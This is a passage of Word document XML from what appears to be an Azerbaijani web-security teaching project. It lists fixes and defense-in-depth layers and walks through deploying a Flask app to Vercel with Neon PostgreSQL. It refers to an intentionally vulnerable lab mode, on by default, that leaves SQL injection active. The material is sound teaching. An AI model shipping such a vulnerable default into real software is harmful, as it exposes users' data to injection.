      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7846"/>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python-magic → MIME yoxlama</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7846"/>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CSP + X-Frame-Options + X-Content-Type-Options başlıqları</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7846"/>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query_probe / sql_fragment cavabdan çıxarılmalı</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7846"/>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uploads/ üçün Content-Disposition: attachment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7846"/>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Bütün sorğular parametrləşdirilmiş olsun</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7.3. Müdafiə-Dərinliyi (Defense in Depth) Prinsipi</w:t>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Bir yama kifayət etmir. Professional sistemlər çox qatlı müdafiə istifadə edir — hər qatın öz vəzifəsi var; biri keçilsə, digərləri hücumu yavaşladır və ya bloklayır.</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646"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Qat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Əhatə</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3646"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Tətbiq</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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1 — Giriş Validasiyası</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Uzunluq, format, null-byte, tip yoxlaması</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3646"/>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login_input_bounds(), validate_email()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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2 — SQL Parametrləşdirməsi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Injection mümkün olmur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3646"/>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psycopg2 %s parametrləri</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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3 — Çıxış Sanitasiyası</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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XSS qarşısı</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3646"/>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bleach, esc(), DOMPurify, textContent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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4 — Autentifikasiya</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Güclü hash, rate limiting, 2FA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3646"/>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PBKDF2-SHA256, flask-limiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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5 — Avtorizasiya</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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RBAC, IDOR yoxlaması</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3646"/>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user_has_role(), AND user_id=%s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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6 — HTTP Başlıqları</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Brauzer-tərəfi qoruma</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3646"/>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CSP, HSTS, X-Frame-Options, nosniff</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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7 — Şifrələmə</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Şəbəkə trafikini qoru</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3646"/>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HTTPS, SSL/TLS, sslmode=require</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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8 — Monitorinq</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Anomaliya aşkarla</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3646"/>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Giriş logları, audit trail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="8"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Deploy — Vercel + Neon PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">8.1. Deploy Strategiyası</w:t>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Deploy — yazdığın kodu öz kompyuterin deyil, başqa birinin serverlərindən istifadəçilərə çatdırmaq prosesidir. Bu layihə üçün aşağıdakı strategiya seçilmişdir:</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646"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Komponent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Servis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4646"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Niyə?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Flask backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Vercel Serverless</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4646"/>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Pulsuz, GitHub inteqrasiyası, avtomatik HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Neon (bulud)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4646"/>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Vercel ilə eyni region, pulsuz tier, serverless-uyğun</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Statik fayllar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Vercel (Flask vasitəsilə)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4646"/>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Ayrı CDN lazım deyil — Flask frontend/ qovluğunu verir</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">8.2. Vercel Konfiqurasiyası</w:t>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vercel.json faylı Vercel-ə deyir ki, gələn hər URL-i (login.html, /api/me, uploads/photo.jpg) api/index funksiyasına yönləndir. Flask bu URL-ləri özü idarə edir:</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8846"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0F4FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// vercel.json</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">{ "rewrites": [{ "source": "/(.*)", "destination": "/api/index" }] }</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># api/index.py — Vercel-in giriş nöqtəsi (12 sətir)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">import sys</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">from pathlib import Path</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">_root = Path(__file__).resolve().parent.parent</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">if str(_root) not in sys.path:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    sys.path.insert(0, str(_root))</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">from backend.app import app  # Flask tətbiqini ixrac et</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">8.3. Lokal vs Vercel Müqayisəsi</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646"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Aspekt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Lokal Mühit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3646"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Vercel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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İşə salma</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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python backend/app.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3646"/>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git push origin main → avtomatik</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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http://127.0.0.1:5000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3646"/>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https://layihe.vercel.app</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Debug rejimi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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debug=True — stacktrace görünür</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3646"/>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debug=False — yalnız log</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Yoxdur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3646"/>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Avtomatik (Let's Encrypt)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Upload qovluğu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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uploads/ (persistent)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3646"/>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/tmp/ (müvəqqəti, söndükdə silinir)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Lokal PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3646"/>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Neon/Supabase (SSL məcburi)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Lab rejimi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FCE4D6"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WEBSEC_LAB=1 (default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3646"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FCE4D6"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WEBSEC_LAB=0 — mütləq!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Cookie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Secure=False (HTTP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3646"/>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Secure=True, HttpOnly=True</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">8.4. Deploy Addımları</w:t>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Vercel-ə deploy beş addımdan ibarətdir: (1) GitHub repozitoriyasında .gitignore-da .env faylının olduğuna əmin ol; (2) git push origin main; (3) vercel.com-da GitHub repo-nu seç, Framework Preset: Other; (4) Environment Variables bölməsindən DATABASE_URL, FLASK_SECRET_KEY, WEBSEC_LAB=0 əlavə et; (5) Deploy düyməsini bas.</w:t>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Deploy sonrası sağlamlıq yoxlaması:</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8846"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0F4FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">curl https://layihe.vercel.app/api/health</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Gözlənilən: {"ok": true, "db": "postgres", "reachable": true}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">8.5. Serverless Məhdudiyyəti — Fayl Yükləmə</w:t>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Vercel-in /var/task/ qovluğu read-only-dir; yalnız /tmp/ yazıla biləndir. Amma /tmp/ qısa ömürlüdür — serverless funksiya söndükdə içindəki hər şey silinir. Produksiya həlli: Flask yalnız metadata DB-yə yazır, faylın özü AWS S3, Vercel Blob və ya Cloudinary-ə göndərilir.</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8846"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="FF6600" w:sz="8"/>
              <w:left w:val="single" w:color="FF6600" w:sz="24"/>
              <w:bottom w:val="single" w:color="FF6600" w:sz="8"/>
              <w:right w:val="single" w:color="FF6600" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:fill="FFF8F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="CC4400"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">WEBSEC_LAB=0 parametrini Vercel Environment Variables-da mütləq təyin edin. Aksinə halda SQL injection aktiv qalır!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="8"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
